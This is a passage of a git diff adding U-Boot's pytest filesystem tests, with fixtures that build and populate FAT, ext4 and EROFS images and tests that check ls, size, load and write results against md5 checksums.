mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % mount_dir, shell=True) + + # Create big file in this image. + # Note that we work only on the start 1MB, couple MBs in the 2GB range + # and the last 1 MB of the huge 2.5GB file. + # So, just put random values only in those areas. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=2 seek=2047' + % big_file, shell=True) + check_call('dd if=/dev/urandom of=%s bs=1M count=1 seek=2499' + % big_file, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Delete the small file copies which possibly are written as part of a + # previous test. 
+ # check_call('rm -f "%s.w"' % MB1, shell=True) + # check_call('rm -f "%s.w2"' % MB1, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Generate the md5sums of reads that we will test against big file + # One from beginning of file. + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from end of file. + out = check_output( + 'dd if=%s bs=1M skip=2499 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the last 1MB chunk of 2GB + out = check_output( + 'dd if=%s bs=1M skip=2047 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One from the start 1MB chunk from 2GB + out = check_output( + 'dd if=%s bs=1M skip=2048 count=1 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + # One 1MB chunk crossing the 2GB boundary + out = check_output( + 'dd if=%s bs=512K skip=4095 count=2 2> /dev/null | md5sum' + % big_file, shell=True).decode() + md5val.append(out.split()[0]) + + except CalledProcessError as err: + pytest.skip('Setup failed for filesystem: ' + fs_type + '. {}'.format(err)) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for extended fs test +# +@pytest.fixture() +def fs_obj_ext(request, u_boot_config): + """Set up a file system to be used in extended fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for extended fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + min_file = mount_dir + '/' + MIN_FILE + tmp_file = mount_dir + '/tmpfile' + + try: + + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. 
{}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a test directory + check_call('mkdir %s/dir1' % mount_dir, shell=True) + + # Create a small file and calculate md5 + check_call('dd if=/dev/urandom of=%s bs=1K count=20' + % min_file, shell=True) + out = check_output( + 'dd if=%s bs=1K 2> /dev/null | md5sum' + % min_file, shell=True).decode() + md5val = [ out.split()[0] ] + + # Calculate md5sum of Test Case 4 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 5 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=5 count=5' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + # Calculate md5sum of Test Case 7 + check_call('dd if=%s of=%s bs=1K count=20' + % (min_file, tmp_file), shell=True) + check_call('dd if=%s of=%s bs=1K seek=20 count=20' + % (min_file, tmp_file), shell=True) + out = check_output('dd if=%s bs=1K 2> /dev/null | md5sum' + % tmp_file, shell=True).decode() + md5val.append(out.split()[0]) + + check_call('rm %s' % tmp_file, shell=True) + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for mkdir test +# +@pytest.fixture() +def fs_obj_mkdir(request, u_boot_config): + """Set up a file system to be used in mkdir test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for mkdir test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + try: + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for unlink test +# +@pytest.fixture() +def fs_obj_unlink(request, u_boot_config): + """Set up a file system to be used in unlink test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for unlink test, i.e. a duplet of file system type and + volume file name. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + try: + + # 128MiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x8000000, '128MB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. 
+ mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Test Case 1 & 3 + check_call('mkdir %s/dir1' % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file1 bs=1K count=1' + % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir1/file2 bs=1K count=1' + % mount_dir, shell=True) + + # Test Case 2 + check_call('mkdir %s/dir2' % mount_dir, shell=True) + for i in range(0, 20): + check_call('mkdir %s/dir2/0123456789abcdef%02x' + % (mount_dir, i), shell=True) + + # Test Case 4 + check_call('mkdir %s/dir4' % mount_dir, shell=True) + + # Test Case 5, 6 & 7 + check_call('mkdir %s/dir5' % mount_dir, shell=True) + check_call('dd if=/dev/urandom of=%s/dir5/file1 bs=1K count=1' + % mount_dir, shell=True) + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for symlink fs test +# +@pytest.fixture() +def fs_obj_symlink(request, u_boot_config): + """Set up a file system to be used in symlink fs test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for basic fs test, i.e. a triplet of file system type, + volume file name and a list of MD5 hashes. + """ + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + mount_dir = u_boot_config.persistent_data_dir + '/mnt' + + small_file = mount_dir + '/' + SMALL_FILE + medium_file = mount_dir + '/' + MEDIUM_FILE + + try: + + # 1GiB volume + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, 0x40000000, '1GB') + except CalledProcessError as err: + pytest.skip('Creating failed for filesystem: ' + fs_type + '. {}'.format(err)) + return + + try: + check_call('mkdir -p %s' % mount_dir, shell=True) + except CalledProcessError as err: + pytest.skip('Preparing mount folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Mount the image so we can populate it. + mount_fs(fs_type, fs_img, mount_dir) + except CalledProcessError as err: + pytest.skip('Mounting to folder failed for filesystem: ' + fs_type + '. {}'.format(err)) + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + return + + try: + # Create a subdirectory. + check_call('mkdir %s/SUBDIR' % mount_dir, shell=True) + + # Create a small file in this image. + check_call('dd if=/dev/urandom of=%s bs=1M count=1' + % small_file, shell=True) + + # Create a medium file in this image. 
+ check_call('dd if=/dev/urandom of=%s bs=10M count=1' + % medium_file, shell=True) + + # Generate the md5sums of reads that we will test against small file + out = check_output( + 'dd if=%s bs=1M skip=0 count=1 2> /dev/null | md5sum' + % small_file, shell=True).decode() + md5val = [out.split()[0]] + out = check_output( + 'dd if=%s bs=10M skip=0 count=1 2> /dev/null | md5sum' + % medium_file, shell=True).decode() + md5val.extend([out.split()[0]]) + + except CalledProcessError: + pytest.skip('Setup failed for filesystem: ' + fs_type) + umount_fs(mount_dir) + return + else: + umount_fs(mount_dir) + yield [fs_ubtype, fs_img, md5val] + finally: + call('rmdir %s' % mount_dir, shell=True) + call('rm -f %s' % fs_img, shell=True) + +# +# Fixture for fat test +# +@pytest.fixture() +def fs_obj_fat(request, u_boot_config): + """Set up a file system to be used in fat test. + + Args: + request: Pytest request object. + u_boot_config: U-Boot configuration. + + Return: + A fixture for fat test, i.e. a duplet of file system type and + volume file name. + """ + + # the maximum size of a FAT12 filesystem resulting in 4084 clusters + MAX_FAT12_SIZE = 261695 * 1024 + + # the minimum size of a FAT16 filesystem that can be created with + # mkfs.vfat resulting in 4087 clusters + MIN_FAT16_SIZE = 8208 * 1024 + + fs_type = request.param + fs_img = '' + + fs_ubtype = fstype_to_ubname(fs_type) + check_ubconfig(u_boot_config, fs_ubtype) + + fs_size = MAX_FAT12_SIZE if fs_type == 'fat12' else MIN_FAT16_SIZE + + try: + # the volume size depends on the filesystem + fs_img = fs_helper.mk_fs(u_boot_config, fs_type, fs_size, f'{fs_size}', 1024) + except: + pytest.skip('Setup failed for filesystem: ' + fs_type) + return + else: + yield [fs_ubtype, fs_img] + call('rm -f %s' % fs_img, shell=True) diff --git a/test/py/tests/test_fs/fstest_defs.py b/test/py/tests/test_fs/fstest_defs.py new file mode 100644 index 00000000000..35b2bb65183 --- /dev/null +++ b/test/py/tests/test_fs/fstest_defs.py @@ -0,0 +1,16 @@ +# SPDX-License-Identifier: GPL-2.0+ + +# $MIN_FILE is the name of the 20KB file in the file system image +MIN_FILE='testfile' + +# $SMALL_FILE is the name of the 1MB file in the file system image +SMALL_FILE='1MB.file' + +# $MEDIUM_FILE is the name of the 10MB file in the file system image +MEDIUM_FILE='10MB.file' + +# $BIG_FILE is the name of the 2.5GB file in the file system image +BIG_FILE='2.5GB.file' + +ADDR=0x01000008 +LENGTH=0x00100000 diff --git a/test/py/tests/test_fs/fstest_helpers.py b/test/py/tests/test_fs/fstest_helpers.py new file mode 100644 index 00000000000..faec2982489 --- /dev/null +++ b/test/py/tests/test_fs/fstest_helpers.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: JJ Hiblot <jjhiblot@ti.com> +# + +from subprocess import check_call, CalledProcessError + +def assert_fs_integrity(fs_type, fs_img): + try: + if fs_type == 'ext4': + check_call('fsck.ext4 -n -f %s' % fs_img, shell=True) + except CalledProcessError: + raise diff --git a/test/py/tests/test_fs/test_basic.py b/test/py/tests/test_fs/test_basic.py new file mode 100644 index 00000000000..71f3e86fb18 --- /dev/null +++ b/test/py/tests/test_fs/test_basic.py @@ -0,0 +1,292 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Basic Test + +""" +This test verifies basic read/write operation on file system. 
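+
+A typical invocation, shown for illustration only (the wrapper script path and
+any extra options depend on the local setup), is:
+
+    ./test/py/test.py --bd sandbox -k 'TestFsBasic'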
+""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsBasic(object): + def test_fs1(self, u_boot_console, fs_obj_basic): + """ + Test Case 1 - ls command, listing a root directory and invalid directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 1a - ls'): + # Test Case 1 - ls + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sls host 0:0' % fs_type]) + assert(re.search('2621440000 *%s' % BIG_FILE, ''.join(output))) + assert(re.search('1048576 *%s' % SMALL_FILE, ''.join(output))) + + with u_boot_console.log.section('Test Case 1b - ls (invalid dir)'): + # In addition, test with a nonexistent directory to see if we crash. + output = u_boot_console.run_command( + '%sls host 0:0 invalid_d' % fs_type) + if fs_type == 'ext4': + assert('Can not find directory' in output) + else: + assert('' == output) + + def test_fs2(self, u_boot_console, fs_obj_basic): + """ + Test Case 2 - size command for a small file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 2a - size (small)'): + # 1MB is 0x0010 0000 + # Test Case 2a - size of small file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + with u_boot_console.log.section('Test Case 2b - size (/../<file>)'): + # Test Case 2b - size of small file via a path using '..' + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /SUBDIR/../%s' % (fs_type, SMALL_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs3(self, u_boot_console, fs_obj_basic): + """ + Test Case 3 - size command for a large file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 3 - size (large)'): + # 2.5GB (1024*1024*2500) is 0x9C40 0000 + # Test Case 3 - size of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%ssize host 0:0 /%s' % (fs_type, BIG_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=9c400000' in ''.join(output)) + + def test_fs4(self, u_boot_console, fs_obj_basic): + """ + Test Case 4 - load a small file, 1MB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 4 - load (small)'): + # Test Case 4a - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + def test_fs5(self, u_boot_console, fs_obj_basic): + """ + Test Case 5 - load, reading first 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 5 - load (first 1MB)'): + # Test Case 5a - First 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x0' % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 5b - First 1MB of big file + output = u_boot_console.run_command_list([ + 
'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + def test_fs6(self, u_boot_console, fs_obj_basic): + """ + Test Case 6 - load, reading last 1MB of 3GB file + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 6 - load (last 1MB)'): + # fails for ext as no offset support + # Test Case 6a - Last 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x9c300000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 6b - Last 1MB of big file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[2] in ''.join(output)) + + def test_fs7(self, u_boot_console, fs_obj_basic): + """ + Test Case 7 - load, 1MB from the last 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 7 - load (last 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 7a - One from the last 1MB chunk of 2GB + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff00000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 7b - One from the last 1MB chunk of 2GB + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + + def test_fs8(self, u_boot_console, fs_obj_basic): + """ + Test Case 8 - load, reading first 1MB in 2GB + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 8 - load (first 1MB in 2GB)'): + # fails for ext as no offset support + # Test Case 8a - One from the start 1MB chunk from 2GB + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x80000000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 8b - One from the start 1MB chunk from 2GB + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[4] in ''.join(output)) + + def test_fs9(self, u_boot_console, fs_obj_basic): + """ + Test Case 9 - load, 1MB crossing 2GB boundary + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 9 - load (crossing 2GB boundary)'): + # fails for ext as no offset support + # Test Case 9a - One 1MB chunk crossing the 2GB boundary + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s %x 0x7ff80000' + % (fs_type, ADDR, BIG_FILE, LENGTH), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 9b - One 1MB chunk crossing the 2GB boundary + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[5] in ''.join(output)) + + def test_fs10(self, u_boot_console, fs_obj_basic): + """ + Test Case 10 - load, reading beyond file end'): + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 10 - load (beyond file end)'): + # Generic failure case + # Test Case 10 - 2MB chunk from the last 1MB of big file + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s 0x00200000 0x9c300000' + % (fs_type, ADDR, BIG_FILE), + 'printenv filesize', + 'md5sum %x 
$filesize' % ADDR, + 'setenv filesize']) + assert('filesize=100000' in ''.join(output)) + + def test_fs11(self, u_boot_console, fs_obj_basic): + """ + Test Case 11 - write' + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 11 - write'): + # Read 1MB from small file + # Write it back to test the writes + # Test Case 11a - Check that the write succeeded + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /%s.w $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 11b - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.w' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs12(self, u_boot_console, fs_obj_basic): + """ + Test Case 12 - write to "." directory + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 12 - write (".")'): + # Next test case checks writing a file whose dirent + # is the first in the block, which is always true for "." + # The write should fail, but the lookup should work + # Test Case 12 - Check directory traversal + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /. 0x10' % (fs_type, ADDR)]) + assert('Unable to write' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs13(self, u_boot_console, fs_obj_basic): + """ + Test Case 13 - write to a file with "/./<filename>" + """ + fs_type,fs_img,md5val = fs_obj_basic + with u_boot_console.log.section('Test Case 13 - write ("./<file>")'): + # Read 1MB from small file + # Write it via "same directory", i.e. "." dirent + # Test Case 13a - Check directory traversal + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + '%swrite host 0:0 %x /./%s2 $filesize' + % (fs_type, ADDR, SMALL_FILE)]) + assert('1048576 bytes written' in ''.join(output)) + + # Test Case 13b - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /./%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + + # Test Case 13c - Check md5 of written to is same + # as the one read from + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /%s2' % (fs_type, ADDR, SMALL_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_erofs.py b/test/py/tests/test_fs/test_erofs.py new file mode 100644 index 00000000000..87ad8f2d5fd --- /dev/null +++ b/test/py/tests/test_fs/test_erofs.py @@ -0,0 +1,220 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2022 Huang Jianan <jnhuang95@gmail.com> +# Author: Huang Jianan <jnhuang95@gmail.com> + +import os +import pytest +import shutil +import subprocess + +EROFS_SRC_DIR = 'erofs_src_dir' +EROFS_IMAGE_NAME = 'erofs.img' + +def generate_file(name, size): + """ + Generates a file filled with 'x'. 
+ """ + content = 'x' * size + file = open(name, 'w') + file.write(content) + file.close() + +def make_erofs_image(build_dir): + """ + Makes the EROFS images used for the test. + + The image is generated at build_dir with the following structure: + erofs_src_dir/ + ├── f4096 + ├── f7812 + ├── subdir/ + │  └── subdir-file + ├── symdir -> subdir + └── symfile -> f5096 + """ + root = os.path.join(build_dir, EROFS_SRC_DIR) + os.makedirs(root) + + # 4096: uncompressed file + generate_file(os.path.join(root, 'f4096'), 4096) + + # 7812: Compressed file + generate_file(os.path.join(root, 'f7812'), 7812) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink + os.symlink('subdir', os.path.join(root, 'symdir')) + os.symlink('f7812', os.path.join(root, 'symfile')) + + input_path = os.path.join(build_dir, EROFS_SRC_DIR) + output_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + args = ' '.join([output_path, input_path]) + subprocess.run(['mkfs.erofs -zlz4 ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def clean_erofs_image(build_dir): + """ + Deletes the image and src_dir at build_dir. + """ + path = os.path.join(build_dir, EROFS_SRC_DIR) + shutil.rmtree(path) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + os.remove(image_path) + +def erofs_ls_at_root(u_boot_console): + """ + Test if all the present files and directories were listed. + """ + no_slash = u_boot_console.run_command('erofsls host 0') + slash = u_boot_console.run_command('erofsls host 0 /') + assert no_slash == slash + + expected_lines = ['./', '../', '4096 f4096', '7812 f7812', 'subdir/', + '<SYM> symdir', '<SYM> symfile', '4 file(s), 3 dir(s)'] + + output = u_boot_console.run_command('erofsls host 0') + for line in expected_lines: + assert line in output + +def erofs_ls_at_subdir(u_boot_console): + """ + Test if the path resolution works. + """ + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + output = u_boot_console.run_command('erofsls host 0 subdir') + for line in expected_lines: + assert line in output + +def erofs_ls_at_symlink(u_boot_console): + """ + Test if the symbolic link's target resolution works. + """ + output = u_boot_console.run_command('erofsls host 0 symdir') + output_subdir = u_boot_console.run_command('erofsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['./', '../', '100 subdir-file', '1 file(s), 2 dir(s)'] + for line in expected_lines: + assert line in output + +def erofs_ls_at_non_existent_dir(u_boot_console): + """ + Test if the EROFS support will crash when get a nonexistent directory. + """ + out_non_existent = u_boot_console.run_command('erofsls host 0 fff') + out_not_dir = u_boot_console.run_command('erofsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '' in out_non_existent + +def erofs_load_files(u_boot_console, files, sizes, address): + """ + Loads files and asserts their checksums. 
+ """ + build_dir = u_boot_console.config.build_dir + for (file, size) in zip(files, sizes): + out = u_boot_console.run_command('erofsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # calculate u-boot file's checksum + out = u_boot_console.run_command('md5sum {} {}'.format(address, hex(int(size)))) + u_boot_checksum = out.split()[-1] + + # calculate original file's checksum + original_file_path = os.path.join(build_dir, EROFS_SRC_DIR + '/' + file) + out = subprocess.run(['md5sum ' + original_file_path], shell=True, check=True, + capture_output=True, text=True) + original_checksum = out.stdout.split()[0] + + # compare checksum + assert u_boot_checksum == original_checksum + +def erofs_load_files_at_root(u_boot_console): + """ + Test load file from the root directory. + """ + files = ['f4096', 'f7812'] + sizes = ['4096', '7812'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_files_at_subdir(u_boot_console): + """ + Test load file from the subdirectory. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_files_at_symlink(u_boot_console): + """ + Test load file from the symlink. + """ + files = ['symfile'] + sizes = ['7812'] + address = '$kernel_addr_r' + erofs_load_files(u_boot_console, files, sizes, address) + +def erofs_load_non_existent_file(u_boot_console): + """ + Test if the EROFS support will crash when load a nonexistent file. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = u_boot_console.run_command('erofsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def erofs_run_all_tests(u_boot_console): + """ + Runs all test cases. + """ + erofs_ls_at_root(u_boot_console) + erofs_ls_at_subdir(u_boot_console) + erofs_ls_at_symlink(u_boot_console) + erofs_ls_at_non_existent_dir(u_boot_console) + erofs_load_files_at_root(u_boot_console) + erofs_load_files_at_subdir(u_boot_console) + erofs_load_files_at_symlink(u_boot_console) + erofs_load_non_existent_file(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_erofs') +@pytest.mark.buildconfigspec('fs_erofs') +@pytest.mark.requiredtool('mkfs.erofs') +@pytest.mark.requiredtool('md5sum') + +def test_erofs(u_boot_console): + """ + Executes the erofs test suite. + """ + build_dir = u_boot_console.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. 
+ u_boot_console.restart_uboot() + + try: + # setup test environment + make_erofs_image(build_dir) + image_path = os.path.join(build_dir, EROFS_IMAGE_NAME) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + # run all tests + erofs_run_all_tests(u_boot_console) + except: + clean_erofs_image(build_dir) + raise AssertionError + + # clean test environment + clean_erofs_image(build_dir) diff --git a/test/py/tests/test_fs/test_ext.py b/test/py/tests/test_fs/test_ext.py new file mode 100644 index 00000000000..05fefa53a0e --- /dev/null +++ b/test/py/tests/test_fs/test_ext.py @@ -0,0 +1,355 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:Exntented Test + +""" +This test verifies extended write operation on file system. +""" + +import os.path +import pytest +import re +from subprocess import check_output +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + +PLAIN_FILE='abcdefgh.txt' +MANGLE_FILE='abcdefghi.txt' + +def str2fat(long_filename): + splitext = os.path.splitext(long_filename.upper()) + name = splitext[0] + ext = splitext[1][1:] + if len(name) > 8: + name = '%s~1' % name[:6] + return '%-8s %s' % (name, ext) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsExt(object): 